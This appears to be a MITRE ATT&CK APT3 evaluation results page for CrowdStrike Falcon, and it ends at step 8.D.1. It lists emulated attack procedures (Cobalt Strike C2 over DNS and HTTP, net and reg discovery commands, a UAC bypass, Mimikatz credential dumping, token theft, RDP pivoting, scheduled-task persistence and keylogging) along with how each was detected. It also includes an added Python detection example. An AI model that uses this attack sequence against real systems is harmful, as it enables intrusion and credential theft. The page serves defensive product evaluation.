APT3 Evaluation Results: CrowdStrike (All Results)
Vendor product: CrowdStrike Falcon, Endpoint Protection Standard Bundle (OverWatch, Insight, Prevent)
CrowdStrike: All Results Tactic Page Information

The ATT&CK All Results page displays the procedures, tested techniques, and detection results for all steps in an evaluation. The Procedure column contains a description of how the technique in the corresponding technique column was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation; these are not endorsed or validated by MITRE.

Legend

Main Detection Categories: None, Telemetry, Indicator of Compromise, General Behavior, Specific Behavior, Enrichment
Detection Modifiers: Tainted, Delayed, Configuration Change
Step / Procedure / Technique / Detection Type / Detection Notes
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
Telemetry
Telemetry within the alert showed that Resume Viewer.exe executed, and would also be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1]
General Behavior
A General Behavior alert for Machine Learning showed that Resume Viewer.exe was executed and that it was detected as malicious. [1]
Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32
Rundll32
(T1085)
Specific Behavior
A Specific Behavior alert was generated due to rundll32 launching a suspended process. The alert was mapped to the correct ATT&CK Technique (Rundll32) and Tactic (Defense Evasion). [1] [2]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating rundll32 executing update.dat was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed rundll32.exe executing, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)
Scripting
(T1064)
Telemetry
Telemetry showed pdfhelper.cmd being executed by cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of pdfhelper.cmd was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry
Telemetry showed Registry activity related to the Startup folder. Though no screenshot of the file write is available, this data may be indicative of modifications to the folder. [1] [2]
1.C.1
Cobalt Strike: C2 channel established using port 53
Commonly Used Port
(T1043)
None
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed (no detection showed port 53 specifically). [1] [2] [3] [4]
Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com
Standard Application Layer Protocol
(T1071)
Specific Behavior
A Specific Behavior alert was generated for abnormally large DNS requests for freegoogleadsenseinfo.com (C2 domain) being sent. The alert was mapped to a related ATT&CK Technique (Exfiltration Over Alternative Protocol) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior occurred because they observed suspected command and control or data exfiltration via DNS.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating the DNS traffic was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry within the OverWatch alert showed the DNS requests, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding
Data Encoding
(T1132)
Telemetry (Tainted)
Telemetry showed the base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Exfiltration alert. [1]
2.A.1
Cobalt Strike: 'ipconfig -all' via cmd
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because ipconfig was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The process tree showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran ipconfig) were considered tainted and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because arp was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran arp) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner/User Discovery
(T1033)
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran echo) were considered tainted. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because echo was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
2.C.2
Cobalt Strike: 'tasklist -v' via cmd
Process Discovery
(T1057)
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran tasklist) were considered tainted. [1] [2] [3] [4] [5]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because tasklist was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because sc query was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran sc) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran systeminfo) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because systeminfo was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating systeminfo execution was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net config was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating net localgroup execution was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
2.F.2
Cobalt Strike: 'net localgroup administrators -domain' via cmd
Permission Groups Discovery
(T1069)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
2.F.3
Cobalt Strike: 'net group "Domain Admins" -domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
2.G.1
Cobalt Strike: 'net user -domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net.exe) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
2.G.2
Cobalt Strike: 'net user george -domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran reg) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because reg query was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Bypass User Account Control
(T1088)
Telemetry
Telemetry showed an integrity level change for user Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High), which is indicative of bypassing UAC. [1] [2] [3] [4]
Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token
Access Token Manipulation
(T1134)
None
No detection capability demonstrated for this procedure. [1]
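The "Tainted" modifier used throughout the discovery steps above (child cmd.exe processes inheriting suspicion from the alerted rundll32.exe ancestor) and the Medium-to-High integrity-level jump quoted in step 3.A.1 are both simple tree and state checks. The following is an added example, not code from the MITRE evaluation or from CrowdStrike; the process-creation events, pids and integrity samples are constructed, and the function names are this example's own.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Windows mandatory-integrity RIDs quoted in the 3.A.1 telemetry note
MEDIUM_INTEGRITY = 0x2000  # 8192, Medium
HIGH_INTEGRITY = 0x3000    # 12288, High


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    detections: List[str] = field(default_factory=list)  # alerts raised on this process itself
    tainted_by: Optional[int] = None  # pid of the nearest ancestor that carries a detection


# Constructed process-creation telemetry following the narrative of steps
# 1.A.1 and 2.A.1 (pids are made up; image names follow the evaluation).
EVENTS = [
    dict(pid=100, ppid=1,   image="explorer.exe",      cmdline="explorer.exe"),
    dict(pid=200, ppid=100, image="Resume Viewer.exe", cmdline='"Resume Viewer.exe"',
         detections=["General Behavior: Machine Learning"]),
    dict(pid=300, ppid=200, image="cmd.exe",           cmdline="cmd.exe /c pdfhelper.cmd"),
    dict(pid=400, ppid=300, image="rundll32.exe",      cmdline="rundll32.exe update.dat",
         detections=["Specific Behavior: rundll32 launched a suspended process"]),
    dict(pid=500, ppid=400, image="cmd.exe",           cmdline="cmd.exe /c ipconfig -all"),
    dict(pid=600, ppid=500, image="ipconfig.exe",      cmdline="ipconfig -all"),
    # an unrelated interactive shell under explorer.exe: must stay untainted
    dict(pid=700, ppid=100, image="cmd.exe",           cmdline="cmd.exe"),
]


def build_tree(events) -> Dict[int, Proc]:
    return {e["pid"]: Proc(**e) for e in events}


def propagate_taint(procs: Dict[int, Proc]) -> Dict[int, Proc]:
    """Mark each process with the nearest ancestor that has a direct detection.

    This models the 'Tainted' modifier from the legend: telemetry on a child is
    still only telemetry, but the tree view ties it back to the earlier alert.
    """
    for p in procs.values():
        seen = set()  # guards against pid reuse producing a cycle
        cur = procs.get(p.ppid)
        while cur is not None and cur.pid not in seen:
            seen.add(cur.pid)
            if cur.detections:
                p.tainted_by = cur.pid
                break
            cur = procs.get(cur.ppid)
    return procs


def tainted_descendants(procs: Dict[int, Proc], pid: int) -> List[int]:
    """All processes whose taint traces back to `pid`, in pid order."""
    return sorted(p.pid for p in procs.values() if p.tainted_by == pid)


def label_telemetry(procs: Dict[int, Proc], pid: int) -> str:
    """Label raw telemetry for `pid` the way the results table does."""
    p = procs[pid]
    if p.detections:
        return p.detections[0]
    if p.tainted_by is not None:
        return f"Telemetry (Tainted by pid {p.tainted_by} {procs[p.tainted_by].image})"
    return "Telemetry"


def integrity_escalations(observations: List[Tuple[int, int]]) -> List[int]:
    """Return pids whose token integrity rose from Medium (0x2000) to High (0x3000).

    `observations` is an ordered list of (pid, integrity_rid) samples. A jump
    from Medium to High inside one process is the UAC-bypass indicator that the
    3.A.1 telemetry note describes.
    """
    last: Dict[int, int] = {}
    flagged: List[int] = []
    for pid, level in observations:
        if last.get(pid) == MEDIUM_INTEGRITY and level == HIGH_INTEGRITY and pid not in flagged:
            flagged.append(pid)
        last[pid] = level
    return flagged


# Constructed integrity samples: the beacon process goes Medium -> High,
# while its child shell stays at Medium.
INTEGRITY_SAMPLES = [(400, MEDIUM_INTEGRITY), (500, MEDIUM_INTEGRITY),
                     (400, HIGH_INTEGRITY), (500, MEDIUM_INTEGRITY)]

if __name__ == "__main__":
    tree = propagate_taint(build_tree(EVENTS))
    for pid in sorted(tree):
        print(pid, tree[pid].cmdline, "->", label_telemetry(tree, pid))
    print("UAC-bypass indicator on pids:", integrity_escalations(INTEGRITY_SAMPLES))
```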
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert identifying the injection as suspicious. The process tree view showed the alert as tainted by previous svchost.exe and powershell.exe detections.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5]
Specific Behavior (Tainted)
A Specific Behavior alert was generated showing that PowerShell created a thread into a remote process. The alert identified the correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion). The process tree view showed the alert as tainted by parent svchost.exe and powershell.exe detections. [1] [2] [3] [4] [5]
Telemetry
Telemetry associated with the alert would show thread creation in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5]
4.A.1
Cobalt Strike: 'net group "Domain Controllers" -domain' via cmd
Remote System Discovery
(T1018)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe executing with command-line arguments, and would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert identifying cmd.exe executing net as suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
4.A.2
Cobalt Strike: 'net group "Domain Computers" -domain' via cmd
Remote System Discovery
(T1018)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe with command-line arguments, and would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team identified net group as suspicious with a General Behavior alert.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netsh was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry within the OverWatch alert showed netsh executing with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of netsh by cmd.exe was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netstat was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the OverWatch alert showed cmd.exe executing netstat with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating cmd.exe executing netstat with command-line arguments was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7]
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
Telemetry
Telemetry showing the lsass handle open and DLL loading would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
General Behavior (Delayed, Tainted)
A General Behavior alert was generated by the OverWatch team indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a parent detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3]
Cobalt Strike: Credential dump capability involved process injection into lsass
Process Injection
(T1055)
Enrichment
The capability enriched several event types with descriptions, including a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), as well as an access to the lsass process flagged as process hollowing (ProcessHollowingDetected). [1] [2] [3] [4] [5]
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Telemetry
Telemetry for the lsass remote thread and DLL loading would be available in a separate view.[CS8] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a previous detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3]
Specific Behavior (Tainted)
A second Specific Behavior alert was generated for Credential Dumping, which indicated that "a remote thread in LSASS accessed credential registry keys." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Cobalt Strike: Hash dump capability involved process injection into lsass.exe
Process Injection
(T1055)
Enrichment
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), malicious process hollowing (ProcessHollowingDetected), and a remote process injecting code into lsass (LsassInjectedCode). [1] [2] [3] [4] [5]
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry
Telemetry showed the compromised process (21898821890) running as Debbie, then children from this process spawning first as Debbie and later as George. This could indicate theft of George's token within the context of the process. [1]
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the reg query command was suspicious. The alert was tainted by the parent cmd.exe process.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the parent cmd.exe process. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
6.B.1
Cobalt Strike: C2 channel modified to use port 80
Commonly Used Port
(T1043)
Telemetry
Telemetry showed a connection over TCP port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4]
Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to 192.168.0.4 (C2 server) on port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5] [6]
Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS
Multiband Communication
(T1026)
Telemetry (Tainted)
Telemetry showed connections over both DNS and TCP port 80, which could indicate multiband communication. The DNS connections were tainted by a parent Exfiltration alert. [1] [2]
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed a connection for logon type 10 (interactive logon) and a connection to 10.0.0.5 (Conficker) over TCP port 3389. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because they identified suspicious communications over port 3389 (RDP) to other hosts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
Telemetry showed the creation of the user Jesse and the user being added to the domain admin group. [1] [2] [3]
Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection
Graphical User Interface
(T1061)
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information
Account Discovery
(T1087)
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry (Tainted)
Telemetry showed the file write for updater.dll into the system32 folder by user George. The telemetry was tainted by the parent "unexpected process" alert. [1] [2] [3] [4] [5] [6] [7] [8]
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry
Telemetry showed the creation of the scheduled task. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a scheduled task was created for persistence.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the creation of the scheduled task was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4]
8.A.1
Cobalt Strike: 'dir -s -b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed cmd.exe running dir. The process tree view showed the cmd.exe process that ran dir as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed cmd.exe running tree with command-line arguments. The process tree view also showed the cmd.exe that was the parent for tree.com as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating tree.com was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was identified because tree was one of the reconnaissance commands performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect input capture specifically). [1] [2] [3] [4]
Cobalt Strike: Keylogging capability included residual enumeration of application windows
Application Window Discovery
(T1010)
None
No detection capability demonstrated for this procedure. [1]
8.D.1
